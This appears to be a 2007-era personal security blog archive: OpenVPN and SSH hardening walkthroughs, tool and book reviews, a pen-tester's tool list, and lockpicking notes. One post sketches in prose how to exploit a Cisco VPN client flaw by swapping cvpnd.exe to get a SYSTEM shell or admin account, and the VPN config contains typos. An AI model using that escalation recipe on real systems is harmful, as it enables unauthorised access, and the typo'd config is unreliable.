One last thought has been tickling my mind when it came to that WSJ article I linked to the other day. It was about control and telling people not to cross the lines or do things they're not supposed to do. Think about that for a moment. How far would we get if everyone stayed between the lines? While there are some ethical near-absolutes like murder, most everything else is such small beans that pushing the boundaries now and then can be a good thing. Like working out, you can't build muscle without first making thousands of micro-tears to induce stronger rebuilding. Growing pains, which are going to be abundant in our culture and technology for some time. Even if we don't act on them, it is good to think about them and question our policilial (yes, I make up words) stances.

Besides, even if our users know all this junk, we protect against it, right? Full disclosure?

I recently stood up an OpenVPN server at home. I've done SSH forwarding to protect my hotspot browsing habits in the past, but I thought I would try something new. I installed this on an Ubuntu 7.04 system that was running as a VMWare guest OS. I opted to go with a routed VPN solution. The alternative is a tunneled connection which makes it seem like my VPN client system is right on my home network. My routed solution will rely on the Ubuntu server and my home Linksys router to route traffic from my VPN network (10.8.1.0/24) to my home network (192.168.10.0/24). I also make sure that I force my traffic through my VPN, rather than let it seep out in the clear at the hotspot (the push commands in the server.conf file later on). From bare start to finish, this entire setup can be done in under 15 minutes.

I am not going to detail what each command does except in passing, because there is excellent documentation already available for OpenVPN. What I rarely see, however, is a quick walkthrough on how to set it all up on Ubuntu.

I start out by installing the packages that I need. OpenSSL may not be needed, but I included it anyway.

sudo -s
apt-get install openvpn openssl bridge-utils dnsmasq
mkdir /etc/openvpn/keys
mkdir /etc/openvpn/configs
nano /etc/openvpn/server.conf

Server.conf is the server configuration file. The contents describe that I will run my server on the IP 192.168.10.108 and port 1194 udp. My VPN "network" will be in the 10.8.1.0 255.255.255.0 network. OpenVPN will grab 10.8.1.1 as the server, and my client will be given a similar address. Once my client is connected to my OpenVPN server, I should be able to ping 10.8.1.1 and verify I can talk to my server.

port 1194
local 192.168.10.108
proto udp
dev tun0
ca keys/ca.crt
cert kets/server.crt
key keys/server.key
dh keys/dh1024.pem
server 10.8.1.0 255.255.255.0
push "route 192.168.10.0 255.255.255.0"
push "redirect-gateway def1"
push "dhcp-option DNS 10.8.1.1"
ifconfig-pool-persist client-adresses.txt
client-to-client
keepalive 10 120
cipher AES-128-CBC
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
status openvpn-status.log
log openvpn
verb 3
mute 20

The client-addresses.txt file is just a convenient way for me to track who gets what IP.

nano /etc/openvpn/client-addresses.txt

client1,10.8.1.6

Next I take care of the keys I need, along with some other setup. When creating the keys, I don't assign a password, and I do select yes to sign and commit changes.

cd /usr/share/doc/openvpn/examples/easy-rsa/2.0
nano ./vars
#change values at the bottom and save
source ./vars
./clean-all
./build-ca
./build-key-server server
./build-key client1
./build-dh
cd keys
cp ca.key ca.crt dh1024.pem server.key server.crt /etc/openvpn/keys
cp client1.crt client1.key ca.crt /etc/openvpn/configs
cd /etc/openvpn/configs
nano client1.conf

The file client1.conf is the client config file that needs to be given to the connecting client box. LVVPN is the name of my network adapter on the client. After installing the OpenVPN client on the Windows client, create a new TAP and give it this name.

client
dev-node LVVPN
proto udp
dev tun
remote www.terminal23.net 1194
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
cipher AES-128-CBC
comp-lzo
verb 3
mute 20

I need to get the client files to the client. I do this by copying them to the client's home directory, then connecting via SSH to get them. Since I'm running all of this as root, I need to adjust the client1.key file so the client can grab it via SSH, otherwise I'll get a permission error. I then start the service.

cd /etc/openvpn
openvpn --genkey --secret ta.key
cd /etc/openvpn/configs
cp client1.crt client1.key client1.conf ca.crt /home/michael
chmod 604 /home/michael/client1.key
#copy files via SSH to client into openvpn/configs folder
cd..
openvpn /etc/openvpn/server.conf &

I'm never satisfied with just doing something, I usually need to verify it. I do this by making sure the service is running and that it is listening on the expected port.

netstat -a | grep 1194
ps -ax | grep vpn

Finally, I need two more commands to enable IP forwarding for my particular setup.

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.8.1.0/24 -o eth0 -j MASQUERADE

Since my home Linksys router is limited to a GUI, it is a bit hard to detail what I did to set up my route. I just added a new route in the Advanced Routing section. Destination LAN IP is 10.8.1.0, subnet mask 255.255.255.0, and default gateway 192.168.10.108. This was set up to let me talk to my internal systems. I also had to port forward my VPN port to this system. This means that after I'm connected, I can ping 10.8.1.1 to verify I am on my VPNs network. I can then ping 192.168.10.1 (or a valid, responsive host on my home network) and I should get a response if forwarding is working.

From here, start up the client's VPN however you like. Many people start it up by right-clicking the client1.ovpn file (rename client1.conf to client1.ovpn) and choosing to start it as an openvpn connection. I like the tool OpenVPN GUI for Windows. This is merely a personal preference since I like the sys tray interface.

I decided to screw around some more and actually recorded the creation of my OpenVPN server. I did this mostly to do something I've never done before: make a video of something and cut it.

I used VNC on a Windows box to connect to my Ubuntu 7.04 server. I then recorded that window using CamTasia Studio 3.1, which I also used to add music, edit, and produce. The music is Baja by Sasha. The codec (CinePak codec by Radius) is the only codec available by default in CamTasia that worked on both my Windows box using VLC and Windows Media Player, and also on my Ubuntu laptop using Mplayer. If it doesn't work for you, I suggest those players, or tough luck. Maybe I'll choose something better and smaller next time, but for now, this was just a learning experience for me.

The video is over 190MB and runs 12:35. I don't have a real hoster, so I'll leave this video up for a few weeks (or hours if it brings me to a crawl!). If it is not available and you want it, email me and we'll figure something out.

Suggestions are very welcome, but be aware I know this was a very amateur deal. :)

In late 2006, DarkReading published the 10 most overlooked aspects of security, which I think will end up holding true for a very long time.

I dig BookPool.com; I've used them for many of my book purchases over the years, only occassionally delving into Borders/Barnes & Noble/Amazon when I have gift certs or for impulse buys. Today I pre-ordered Virtual Honeypots. This looks to be an awesome how-to sort of book about honeypots; something I've been eagerly waiting to delve into. It should be out any day, really. This was prompted by a welcome spam email from BookPool about a sale on Addison-Wesley and Prentice Hall books.

I'm also eagerly awaiting the Metasploit Toolkit book, despite being published by Syngress (in my opinion, the spottiest tech book publisher with quality all over the place....and I just don't like holding their books like I do Addison-Wesley books). There's a lot of new stuff in Metasploit 3, and I'm holding out really getting into it (like I used Metasploit 2x) until this book comes out. I may combine this with looking into Ruby or Python a bit more. Of all the tool-books out there, only BackTrack comes to mind as needing an updated book (BackTrack 3 perhaps?).

I also see Wi-Foo II has been pushed back (or maybe it was really tentative at late 2007 months ago) into 2008. I'm looking forward to this book as well. The first book was awesome, but got mired down in the technical problems of getting wireless working properly in Linux, which is a requirement for the subject. These days, wireless support is much easier and better, which hopefully means less mud devoted to the intricacies and details. Other books cover it well lately anyway, like Hacking Exposed: Wireless and Syngress' Wardriving and Wireless Penetration Testing. Although not without their own minor faults, are both excellent wireless security books.

A list of 5 essential laptop security tips leaves an important one out and includes a rather dubious entry. Tip #5, install tracking software on your laptop in case it gets stolen. While a neat, feel-good type of geeky thing to install, this is pretty lame for inclusion on a top 5 list. Then again, maybe this list was meant as more of a physical security list, in which case, top 5 is really "the 5 things to do."

Instead, I'd replace #5 with the suggestion to keep backups of all your data on the drive. It is great to not have it stolen, or offer password and encryption options in case it is stolen, but what about the data on the laptop? How much is it worth to you personally? If your laptop is stolen, minimize the damage to only the cost of the hardware and your own stress, not also to the only surviving copies of your son's little league digital pictures or those important sales emails.

I have a Wi-Spy, which is an excellent (and cheap!) specturm analyzer tool. I saw a mention for it on NetGirl's blog over at ArubaNetworks on her list of cool tools. But I didn't know what EaKiu was in her Wi-Spy bullet. I thought about emailing or commenting, but this seemed to require more effort on my part to converse with her, so I resorted to a Google search for the tool in the hopes that the unique string was easily found. Indeed, I saw that EaKiu is software to display results from Wi-Spy! And boy does it look fucking sweet. Now I just have to find a Mac-user to try it out for me.

I'd thought that was what EaKiu was, since I'd seen mention of Mac and Linux software back on MetaGeek's old site, but I could never find that information again on the new site design. Of note, the Linux version, while workable, is still pretty ugly compared to Mac or Windows software.

Love me tools; love me tool lists as well, especially with new things. The Security Mentor himself was right, this list is pretty cool and has some things I didn't know about! If you look closely, pretty much under each of the ten entries are links to MORE similar free tools. Here are the ones that caught my eye. Note that the list is centered on Windows.

Secunia Personal Software Inspector - Holy crap! This is an awesome-sounding tool because trying to keep up with what is patched and what is out of date is one of the least-talked about futile and frustrating efforts in the IT back room! I think this one is going to be a priority to try out this weekend. I don't know about licensing, but I bet you can buy just one copy for business and use it on a base workstation image that has all your applications installed, then use it as your reference. That's money right there!

GMER anti-rootkit - This tool looks really cool, and if it doesn't require an actual installation routine, will likely make it into my desktop toolkit alongside Spybot, Sysinternals tools, and so on. If it requires an install, it could still be useful as another incident response investigation tool. Now, someone needs to make Tripwire free on Windows...

File Shredder - I like the idea of File Shredder, but I'm not sure I really need it. It's not like I am storing illegal or hugely private junk on my systems, and I certainly have no intentions of selling or giving away my disks anytime soon (like any geek, I can and will find uses for everything). Still, it's nice to have one in the pocket if the need arises.

Other tools are iffy to me. I'm not a huge fan of loading my web browser with toolbars and plugins. Anything extremely useful really should get built into the browser eventually. I like seeing more options for IE, especially since my love for Firefix has dwindled as it has gotten bigger, slower, and buggier in the past year. Yes, loading up Firefox with testing/security plugins is awesome, but that's a special purpose and I don't need to browse with them always loaded. The only ones I use regularly are NoScript (only recently!), Tor, a client banner changer (I can't think of the damned name for it right now!), and a plugin that displays the target site IP address at the bottom.

For web privacy stuff, just learn how to empty the cache and where else stuff is stored along with browser and OS tracking options. Yeah, that's not enough, but I've got a bias against cleaners. For new system crapware, learn how to welcome your new system into your home with a quick enema (format and reinstall).

Kevin van Zonneveld has posted some notes on using crontab. I don't use crontab enough, which means I always have to look up the time settings. However, that is easily done via Google. What I really liked about Kevin's notes dealt with handling the errors and pointing them to a file rather than the user's mailbox. I can see reasons for doing it either way.

I don't usually pimp sites, but every now and then I see a blog that looks very cool to follow. RaDaJo seems to be an excellent site to add to my feed. Of note, I got linked to their ARP cache poisoning misconceptions post. As a bonus, check the comments for two more links, one to an awesome GIAC paper that is basically everything you'll ever need to know about ARP poisoning, and the Oxid.it link as well. Maybe all that is left is more details on how to detect ARP cache poisoning, but Raul Siles may have covered that in his paper. I see he has a remediation section, but I've not gotten there yet. Arpwatch/Arpalert...anomalous trends in ARP traffic...

Peter Wood posted two lists to the SecurityFocus pen-test list recently, which I wanted to capture and reproduce here. Feel free to ignore this post.

First, Peter listed a bunch of tools and hardware he takes for on-site work:
1. Test laptop
2. Spare laptop
3. 4-way mains extension lead with regular plug and plug for computer room racks
4. Selection of Ethernet cables and couplers
5. Ethernet / Token Ring adapter (yes, there are still Token Ring users out there!)
6. Mini hub
7. Cisco console cable
8. Cross-over cable
9. External USB hard drive containing rainbow tables
10. USB key for backups
11. DOS bootable USB key
12. Selection of bootable CDs (Ophcrack Live, PasswordChangerPro, NTFSreader)
13. DVD containing copy of all my source files
14. Windows 2000 CD (for rebuilds!)
15. Swiss Army cyber tool
16. Spare laptop hard drive
17. Kensington lock (to comply with client policy if laptop left on site overnight)
18. Vodafone 3G card for Internet access if there's no wireless
19. Laptop mouse x2
20. Mini USB hub
21. Modem cable and adapters (just in case!)
22. Magic markers
23. Blank CDs
24. Wheelie bag to carry it all in!

Second, he listed the directories found on the above-mentioned DVD of tools:
Absinthe
AccessChk
AccessEnum
Achilles
Active-at
adminpak
Amap
APak
AppDetective
ARPsniffer
ATA HD password
Athena
ATK
Beat LM
Buffer Overflow Utility
Cachedump
cain and abel
Cerberus
C-Force
Checkpoint-Rules
Chntpw
Cisco IOS HTTP Vuln
Citrix clients
Cobra
CommView
CookieViewer
Copernic
Core Impact
CRACKERS
        aefsdr
        AOPB
        AOPR
        APDFPRP
        Brutus
        CacheDump
        CMOSpwd
        IPR (Lotus Notes)
        John the Ripper
        L0phtcrack
        LCP
        LMCrack
        Lotus Notes Key
        LSASecretsDump
        MBSA
        NTPWD
        Ophcrack
        Passwd - recovery FULL
        POPcrack
        PWLTOOL
        SAMInside
        AZPR
Crowbar
Crypto4
CUPASS
Data Thief
Dell laptop cmos erase
DHCP Find
Dictionaries
Dumpsec
EFSdump
Essential NetTools
Ethereal Windows Version
Exploits
FGdump
Flash Decompiler
GetAcct
GetUserInfo
GTwhois
Hydra
Hyena
IDserve
IKE-scan
iShadow
KarenWare
Katapulta
LAN Surveyor
LANguard
LDAP Miner
LG
Locksmith
Maestro
Member of
Metasploit
MingSweeper
MSRDP client
MySQL query browser
NBTdump
NBTscan
Nessus
Netalert
NetBiosSpy
Netcat
NetScanTools Pro
Network Protocols Handbook
NetworkView
niktoogle
Nmap
NT Recover
NTFS Reader
NTFSDOS
NTFSRead
Oat
ObiWaN
oracle-sql-injection
Paros
PasswordsPro
Protected Storage PassView
Protos
PsLogList
Putty
PwdChangerPro
pwdump
Rainbow crack
RegBrws
Rempass
RPC scan
RPC Tools
SAMdump
SamInside
SamSpade
ScoopLM
SecuRemote client
ShareEnum
SID
Siphon
SiteDigger
SiVuS
SmartWhois
SMB Audit Tool
SMBcrack
SNMPing
SNScan
SNSI
SOAPbox
SoapMonitor
SolarWinds
Somar
SPIKEproXy
SSL Proxy
Streams
Subnet Calculator
Superscan
SWB
Sysinternals
SysRQ2
Tamper
Tools4Ever
Trojans
twwwscan
UBCD
Ultimate Boot CD
Unicorn Scan
URL discombobulator
USB boot
USBAuditor
Visual Web Spider
VNC
VOIP TESTING
WAR DIAL
WebDAVExplorer
WebInspect
WebScarab
WebSleuth
WinSID
WIRELESS
Wireshark
WPI
Zlash

I'm not sure what to think about GoToSSH.com either. While this is something I've been kinda wondering when it would find a web interface (and likely has others, I just don't know them), I'm not sure I would use it. I certainly would not use it for anything sensitive in nature. It doesn't look like it supports certificates, but simply username/password challenge instead. This may make it somewhat moot to block outbound SSH anymore... (Yes, it always has been moot since it could use any port, but still...) Might be a site worth bookmarking or blacklisting depending on your view.

Network security continues as holding sand...

Snagged from Alex.

The Cisco VPN client for Windows has an interesting advisory out today. The local file cvpnd.exe (C:\Program Files\Cisco Systems\VPN Client) allows a user to replace the file with something else and have it executed with Local System privs. Replace this with a quick script the launches a shell (or does anything else you want) before launching the real cvpnd.exe. I prefer just creating a quick admin account that I control. That's a nice little pocket-exploit to keep in mind, especially since plenty of systems get an initial install of the Cisco VPN and never get updated again for the life of it.

More information is posted on Cisco's site. I saw this pass by the Full-Disclosure list. Local priv escalations don't get much easier...

Networking is amazingly potent right now in our field. We have an amazingly growing number of XXXsec get-togethers in major parts of the country where like-minded geeks and security nuts can get together to hang out, share war stories, push technology to new limits, or just make new friends. Cons are still popping up here and there, and I think they truly are some of the highlights of the year for many a geek.

This has been growing on me, and I am enamored by the concept. Dan Kaminsky has been espousing the idea of "hackerspaces" on his romp through Europe. Hackerspaces are basically places set up where like-minded people can go and hang out, do things, fraternize, and all in a creative and supportive environment. Basically if you like coffee, you hang out at a coffeeshop and chill out; if you like reading, you hang out in a bookstore; if you like video games, you might try out a cyber bar or two with the buds or adopt someone's basement as your playpen. Why not a hacker/geek/technology sort of space? It is an amazing idea, especially for someone like me who lives in a "networking-starved" middle of the country.

Metalab is one that Dan posted a link for. This concept is also a project of the Hacker Foundation. I hope Dan and the Hacker Foundation both continue to bring this to our attention; heck, the idea of presenting slideshows of his romps might be a nice shift of pace for Dan to present about! :)

I also think there is room for hackerspaces as a smaller concept. For instance, I bet many of us have decked out our offices (either cleanly or cluttered and dark!) at home in a way that best suits our work and helps our creativity. For instance, I tend to have black lights and other glowing things in lieu of lights (alone with the glow of monitors or course), in my workspace.

As a side thought, it is interesting that for such a virtualized culture as we have, and as much as we work and live on the net, we still (for the most part) desire physical proximity with like-minded persons.

Someday (not soon!) I'll likely satisfy a curious project of mine in making a more aggressively defensive network. And vulnerabilities like the recently posted Wireshark MMS DoS are a perfect example of having a slightly more dangerous network to interlopers. Put up an outdated Wireshark sniffer while I randomly send out these packets and you won't get too much. Especially anyone who uses live cds with outdated software. In this case, it is not necessarily about protecting devices and data, but actively knocking off rogue intruders.

Skype was down late last week for about 3 days or so. And not just every single user, but also downloads of the software on their site. This was supposedly due to a software algorithm update or something like that. Today I read this was due to the massive reboot of Microsoft Windows computers the night previous. TheRegister also has some info up, and is a little more cohesive.

I call bullshit. This is curiously close to poc code released that supposedly (I say that because I've not tested it, nor could anyone else since the servers were down) would freeze a Skype server, then move to the next one, and so on. It was posted to SecurityLabs.ru. If true, that is certainly a critical, fatal, flaw.

1. A security issue to Skype would be a very, very big deal. One of the biggest contention points with Skype use is its security. I'd do everything in my power as well to protect that, such as shut off all servers and all users and all downloads in an effort to hide the insecurity issue.

2. The Windows reboot shouldn't have occured as late as it seemed like Skype was down. The reboot should occur Tuesday evenings in the dead of night, for automatic users, and at various times. I don't think Skype was down until Thursday...

3. Why now? Why this month? Why not the last few months?

4. And Skype is going to tell us that a mass reboot of users exposed a vulnerability in the availability of their world class system? You have really got to be kidding me... But as much as that can be egg on their face, I would weigh that less than a security incident. Nonetheless, I can't imagine the overhead of reconnecting to Skype truly caused such a showstopping event on the service's login servers. I wonder how many Skypes get turned on every morning anyway?

Ever informative, the Internet Storm Center has an ongoing post which raises similar questions and more. I really like the thought that Skype needs Windows users to log in, so that means all these millions of users all had their machine auto-login? Again, right.

For future reference, Cisco released a passive network mapping tool called SMART, Safe Network Mapping And Reporting Tool.

I don't think I posted it, so I thought I would jot down installing an SSH server on Ubuntu 7.04 (Feisty).

sudo apt-get install ssh
gksudo gedit /etc/ssh/sshd_config

Change the PermitRootLogon to no and change port to desired port number. Add a new line at the bottom, "AllowUsers username" where username is your username you want to allow. You can use "DenyUsers username," but once the AllowUsers is set, all others are denied anyway.

Next, I want to add a little brute-force protection using pam-abl. These instructions may not be current, but they worked out for me. Add "deb http://ubuntu.tolero.org/ edgy main" to your/etc/apt/sources.lists file. Remember to open it as root so you can save it. And yes, I am using edgy instead of feisty in this line.

sudo aptitude update
sudo aptitude upgrade
sudo aptitude install libpam-abl
sudo /etc/init.d/ssh restart

Run "sudo pam_abl" to list the current blacklist, and use --help for more features or manual blocking. Failed logins are collected in /var/lib/abl. SSH logs are written to /var/log/auth.log, however it might be useful to increase the logging level and location. Change "LogLevel INFO" to "LogLevel VERBOSE" to get more out of the logging.

Further hardening can be done. The files /etc/hosts.allow and /etc/hosts.deny will allow or deny the listed users respectively. These lines will allow two IP address ranges to connect but deny all others.

# /etc/hosts.allow
sshd: 10.10.10.0/255.255.255.0
sshd: 192.168.1.0/255.255.255.0

# /etc/hosts.deny
sshd: ALL

Referenced Tolero.org for the pam-abl install. I also note an Ubuntu help file.

Rebecca got me thinking this afternoon about her post on how business and even schools may or are forming sanctions against their users of social networking sites.

It really sucks thinking about stuff like that, and I encourage reading the post and links she gives. I really feel that while some of that stuff is useful for hiring managers looking for appropriate team members, most of that stuff should belong to the realm of the individual. The exceptions being documented and reported harassment and disclosure of sensitive information. I also don't mind hiring managers using such sources of information to determine if a potential employee may be a good fit. That's cool too, in my books, namely using it to learn about someone a bit more.

Take this example. I have a few Suicide Girls t-shirts (I'd link, but it's not work safe) which I don't mind wearing (of note, they're the most comfortable t-shirts I've ever owned) out in public. I'm not a member, but I used to be back when I knew people on the site, a bit before they got "big." So that kinda illustrates a slight individual taste for me, or at least openness (especially to comfy t-shirts!!). While out and about, I might run into people that know me well enough to know where I work. I may meet others to whom I give out business cards with have my company name on it. This is very similar to how people may stumble upon my inappropriate MySpace site (no, I don't really have one) and connect my company to the person's habits.

It's just life, and that's how we are outside of work in our personal lives. We all have some things we'd rather not air out, on either side of the fence. And I really think trying to police social networking sites (which is really trying to steal individualism away from employees and enforcing Thought Police) is futile and detrimental to our culture as a whole.

If my company president saw me out in the street on a Saturday with my Suicide Girls shirt on, the earring I can't wear when at work, and doing a wireless site survey on open wireless networks in the area just because I can, I'd hope that he'd be able to smile, say hi, and not let that carry over professionally or try to change who I am. Anything less, is superficially shallow, in my books.

In a similar vein to last week's Cisco VPN client privilege escalation vulnerability, ZoneAlarm is also susceptible to executable file replacement.

Sadly, this isn't 1998 anymore, and I don't personally know anyone who still uses ZoneAlarm...

Check out WikiScanner if you want to pry a little bit. Use your own company name (and variations!) to see what people at your office have been doing on Wikipedia. Kinda puts some things in our digital world into perspective. He's pretty busy right now, so you might have to reload the query a few times. When you get good hits, you'll see a button that says something like "Wikipedia edits, ahoy!" Click it, then click the number links to expand a new frame with the edit itself.

Silc is a secure chat network, much like an IRC network, only the communication channels are actually encrypted. However, you can still leak out your normal host, which steals away any shot at anonymity. But if you use Silc with Tor, you achieve not only privacy in the channel, but privacy in the connection as well. Nice! As I've seen it said, silc+tor may be the most secure way to communicate with someone on the net. (Yes, I guess you can add an exchange of keys to verify identities...)

First, install Silky. I am doing this work in an updated but newly installed Ubuntu system. Make sure the repositories are unlocked, which should be the first thing done with any Ubuntu install.

sudo apt-get install silky

This will actually also flag and get any dependencies like libsilc.

Start Silky either by typing "silky" into the shell or Applications->Internet->Silky. Being the first time run, it will want to generate keys. Automatic is sufficient. Close out, and let's look into Tor.

sudo apt-get install tor privoxy tsocks

Again, the needed dependencies will be installed. We can then start Tor and call Silky.

torify silky

Click Server, and select a server or supply one you know under Preferences->Edit Preferences. Nothing special needs to be submitted, just use whatever address and port used normally. Connect, and check out the hostmask. That's it! Other programs can start this way as well, such as "torify firefox" and then go to whatismyip.com and verify the external IP (there is a Tor extension which works beautifully, though).

Keep in mind that Tor is not the fastest of connections, and while IRC is pretty resilient, I've found SILC to be a bit more picky about some slowness. I've found Silky can stay up for a few days, but Torify (tsocks) eventually dumps out, so it is not something I'd expect to always leave on.

Now, if someone knows how to implement irssi+silc_plugin (or any silc plugin)+tor, I'd love to hear how! That way I could possibly stay connected on a server using screen to attach whenever I want. Granted, I think I'd need two irssi's since Freenode only wants Tor users to use their special private entrance.

More stuff to Torify can be found on the web.

Looked for a 10/100 (0r /1000) ethernet hub lately? I hadn't either until today. I found it surprisingly difficult to find a hub. Most searches pull up USB hubs, while the rest tend to recommend switches. Great, but I want a hub (or a network tap, but the cost difference is obvious). The only hub I did find in my quick searches today was a $40 job at CompUSA. Forty bucks?! Maybe I'm cheap about certain things, but a 10/100 hub shouldn't be $40.

Roger A. Grimes wrote recently about using a honeypot in the internal network to catch maldoers (am I alone in feeling a bit naughty after seeing the pic of Roger and honey?). I think this approach is a little heavy-handed, even for a throw-away machine. A full-blown honeypot is a bit of an interesting approach to the problem of detecting intrusion. If staff cannot detect intrusions on their real systems or on the network, they're not going to wield a honeypot correctly. And if they do catch someone probing the honeypot, they are already beyond having a problem.

Now, that's not to say I discredit this approach. I'm all for multiple barriers, detections, defenses, and using spare time and resources (even throw-away junk) for any little bit that can help. In fact, in a previous job I had a really old workstation that I opened a share on and configured a few port listeners on. This box was a crude honeypot/detection box that could alert me if something was scanning certain ports (namely 1434) or something was depositing malicious files on the open share (we had a couple of these outbreaks when I first joined up). Not really a honeypot, but it was a box meant to simply trigger an alarm in an environment that was cash-strapped from a back room standpoint. Honeypots seem more geared towards human attackers, as opposed to automata which is more often the culprit.

So, I'm not disagreeing with the approach in total, but I would caution that honeypots internal will indicate something bigger is happening, and there really should (if you can get the budget for it) be other measures in place on the network and real systems to detect intrusions or naughty activity, even if they are just little tripwires or detectors.

The article also gives some nice tools, and I've already picked up that book mentioned and hope to get started on it in the coming months.

It may be cute to complain about business buzzphrases, but we have our own stupid, inane little buzzwords as well. I really hate hearing meaningless maxims like "compliance is a process, not a product." No shit, but don't we purchase products to support processes? Maybe security should idealistic and ephemeral, something we can feel good about in our heads but not actually do anything about...but I guess that's not me. This maxim can be used to attack any product anywhere in our field...making it rather meaningless. I prefer saying something to the effect that, "tools won't create process, process comes first" or "a tool will not solve our problems in the absence of a process." That sort of statement isn't something I can use to attack the idea that NAC can be at least partially justified by compliance efforts. Let's say I do have the process and NAC is my tool to streamline it? Fratto has a point that NAC has a number of drivers behind it, but he is wrong to denounce an arbitrary one using an inane, meaningless buzzphrase.

Saw this from Rothman's daily incites.

Wil Wheaton (I've been a closet fan of his for years, after TNG) gave an excellent keynote recently at PAX. OCMod actually has the full audio up. If you're a gamer of any kind, or once was in your youth, this keynote is worth listening to. Scroll down to the bottom for the full audio (good quality), or just read the article for highlights. Scored this from HARDOCP. You know, the idea of opening an old school arcade would be something I'd readily do given spare cash...

The newly revived Mogull (and he's not a zombie!) states that the $187 per lost record number is garbage. He's right, but let's throw two more logs in.

1. Try to tell anyone who has had their identity stolen or funds maliciously charged to their credit cards that their record is worth only $187. Even those people who have just seen a few pennies charged and flagged by the credit card company could "suffer" more in the thought of what can now happen. I've seen firsthand a few rather scared acquaintences after seeing such a test charge...

2. Let's say you're a medium-sized company but you have only a few very large clients. If you have a breach and let's even just say 2 people, who happen to be your main client executives, decide that breach was damaging and drop your business. This could have devastating effects. Granted, this isn't a "retail" store, but let's just forget quoting too many statistics and numbers lest we lose sight of the real issues.

Practice, practice, practice. This recently came up in a SecurityCatalyst forums thread from Cutaway. You practice until reactions to incidents is automatic. Not only that, but you practice to become better acclimated to something, whether that be a skill or simple knowledge. If you check your internet usage levels or network utilization every day, you get a really strong feel for what to expect. This means one can isolate anomalies much quicker. If you do some lockpicking for an hour every day, eventually you will acquire a feel for doing it quicker, which can expand into being able to tackle tougher locks...

Practice, practice, practice... Professonals need to never forget the basics and the fundamentals of what we do (I know too many who hate the drudgery of such tasks...). Think of it like keeping a finger or monitor on your heartbeat for spot-evaluations or for emergency hospital stays....

Speaking of lockpicking and practice, I actually have been practicing my lockpicking recently. I'll bring a practice lock and a few picks with me to a coffeeshop or movie theater and pick away at it for small chunks of time or before the movie starts. Sometimes I will do so while watching a movie or television at home. Today I was actually able to pick 2 of my 5-pin locks pretty quickly, multiple times. And these were locks I wasn't terribly familiar with yet. That's a pretty big step for me!

Practicing lockpicking has allowed me to go from being a blind raker who gets lucky, to being able to better feel the matching of the pins and which ones are not yet locked. It has also given me my own ability (technique) to determine pin-counts before applying any torque and make guesses when a pin is locked too high or which one is just barely keeping the cylinder from turning.

Of note, I have a simple 21-piece lockpick set that I ordered for about $45, plus a series of practice locks that I found on ebay. I think the locks are about a total of $100, and I have 9 of them. Three of them are cut-away locks so I can actually see the pins. Two of the locks are 3 pins, the rest 5-pins, and I even have a 5-pin spool lock. I highly recommend grabbing a couple cut-away practice locks if you are just starting out, as that really helps.

Michael Santarcangelo poses an interesting question and analogy to the IT security world: do you dance in the rain? Now, you probably won't catch me dancing in the rain unless I'm at an ourdoor concert, but I'm definitely not a scurrier, even if I'm wearing a light shirt headed to an important meeting in the pouring rain. Screw the umbrella; enjoy nature's weather, even if it can be temporarily painful in the winter; you won't die. (Ok, so if you're out in the wilderness camping or hiking, you should be careful, but in an urban setting, you're not going to die.)

But Michael's right, do what makes you happy and gives you passion. It might be a little weird, but happiness begets productivity, and ultimately, we're all more than just our jobs. Keep the optimism. The enthusiasm, while looked at askance by some others, will be respected and rewarded eventually.

Considering our jobs in IT and security, we sometimes don't get our adrenaline pumping until there is an incident. Perhaps that means we might only be happy when it rains? :)

I've been working again with PowerShell, doing some new things. There are still a few nuances to a newbie like me. For instance, while it is easy to create arrays, it is a bit more arcane to remove items from an array. Thankfully, I found a site that gave me the answers I need.

To remove the first item in an array, reassign only items 1 through the length of the array back into the array (or a new array). Remember that arrays are indexed with the first item as 0, not 1.

$array = $array[1..$array.Length]

I have adopted the use of xml files as configuration files for any PowerShell scripts I've been writing for work lately. Today I just found an odd bit of behavior when working with building a new xml file (if the script runs and sees no existing xml config file, it creates one). Normally, adding child objects in xml is fairly straightforward. Assume this is the existing xml.

<installcontrol>
   <serverlist>
      <server>
         <servername>ALDARAAN</servername>
         <servername>TATOOINE</servername>
      </server>
   </serverlist>
<installcontrol>

We can use this script to add a new child server, DANTOOINE.

$xmlFile = Get-Content $xpath
$objNewServer = $xmlFile.CreateElement("server")
$objNewServerName = $xmlFile.CreateElement("servername")
$objNewServerName.Set_InnerText("DANTOOINE")
$objNewServer.AppendChild($objNewServerName)
$xmlFile.installcontrol.serverlist.appendchild($objNewServer)
$xmlFile.Save("$xpath")

This is great, but what if there are no child objects already present, such as in this xml file.

<installcontrol>
   <serverlist>
      <server>
      </server>
    </serverlist>
<installcontrol>

Powershell complains that it can't add append a child to a string. The script needs to change slightly to accomodate. The following snippet will work both for empty parents and also populated parents. The difference is in the 6th line.

$xmlFile = Get-Content $xpath
$objNewServer = $xmlFile.CreateElement("server")
$objNewServerName = $xmlFile.CreateElement("servername")
$objNewServerName.Set_InnerText("DANTOOINE")
$objNewServer.AppendChild($objNewServerName)
$xmlFile.installcontrol["serverlist"].appendchild($objNewServer)
$xmlFile.Save("$xpath")

Upon recommendation in the Security Catalyst Forums, I picked up a copy of The Practice of System and Network Adminsitration by Thomas Limoncelli, et al.

So far I am impressed by the book. This is an ideal book to give any manager or beginner/intermediate SA/NA. It stays technical, but so far all of the advice is very general and common sense for any IT shop. Do automation, do this, don't do this, this is why this is a bad idea, these are universal steps to get yourself out of the hole...

There are moments of mangled sentences and some of the topics seem a bit dated (Windows NT...) but this is so far a book I think I'd like to see on the shelf of any manager (or SA team library) I might have for the foreseeable future. It may not tell you how to automate deployments of Windows XP workstations, for example, but it will give you the reasons why this is a good idea and approaches to take to get shit done.

It is also nice to see some things I've learned on my own to be echoed in this book, validating my own common sense and reinforcing confidence. Despite being a big book (over 1000 pages), it can be read in chunks and is an easy read nonetheless.

Ahh, summer's beginning to give up her fight [1], portending my favorite season, Autumn! I've also been busy at work and at play, which has limited my posting energy. Not only that, but holy crap have some of my feeds been posting a ton the past couple weeks! It is tiring trying to keep up with them, or even to scroll through the articles I don't care to read.

Today's news comes from Marcin who reviews the question of going with a series of best of breed solutions or all-in-one security packages? You'll almost certainly have cost and support benefits from an all-in-one solution, but it may still have small gaps, and certainly tends to be weaker in some areas, if not weaker than the whole of a series of best of breeds put together.

